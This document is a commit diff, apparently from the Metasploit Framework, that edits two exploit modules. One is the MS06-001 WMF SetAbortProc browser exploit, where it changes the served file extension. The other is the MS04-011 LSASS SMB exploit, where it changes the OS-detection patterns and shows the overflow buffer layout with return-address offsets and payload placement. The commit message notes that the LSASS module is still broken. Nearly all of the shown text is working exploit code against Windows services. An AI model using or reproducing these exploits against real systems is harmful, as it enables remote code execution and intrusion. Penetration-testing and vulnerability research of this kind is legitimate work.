Minor changes, LSASS still broked

git-svn-id: file:///home/svn/framework3/trunk@3805 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb

@@ -67,9 +67,9 @@ class Exploits::Windows::Browser::MS06_001_WMF_SETABORTPROC < Msf::Exploit::Remo
 	def on_request_uri(cli, request)
 	
 	
-		ext = 'tiff'
+		ext = 'wmf'
 	
-		if (not request.uri.match(/\.tiff$/i))
+		if (not request.uri.match(/\.wmf$/i))
 			html =
 				"<html><meta http-equiv='refresh' content='0; URL=" +
 				get_resource + '/' + 

modules/exploits/windows/smb/ms04_011_lsass.rb

@@ -80,6 +80,7 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
 		print_status("Bound to #{handle}...")
 
 		print_status('Getting OS information...')
+		
 		# Check the remote OS name and version
 		os = smb_peer_lm
 		string = ''
@@ -89,7 +90,7 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
 			# the un-unicoded data. We simply return to a nop sled that
 			# jumps over the return address, some trash, and into the
 			# final payload. Easy as pie.		
-			when /2000/
+			when /Windows 5\.0/
 				str = Rex::Text.rand_text_alphanumeric(3500)
 				str[2020, 4] = [targets[1]['Rets'][0]].pack('V')
 				str[2104, payload.encoded.length ] = payload.encoded
@@ -100,7 +101,7 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
 			# we make these bytes jump back to the beginning of the
 			# buffer, giving us about 1936 bytes of space for a
 			# payload.				
-			when /XP/
+			when /Windows 5\.1/
 				str = Rex::Text.rand_text_alphanumeric(7000)
 				str[0, payload.encoded.length ] = payload.encoded
 				str[1964, 4] = [targets[2]['Rets'][0]].pack('V')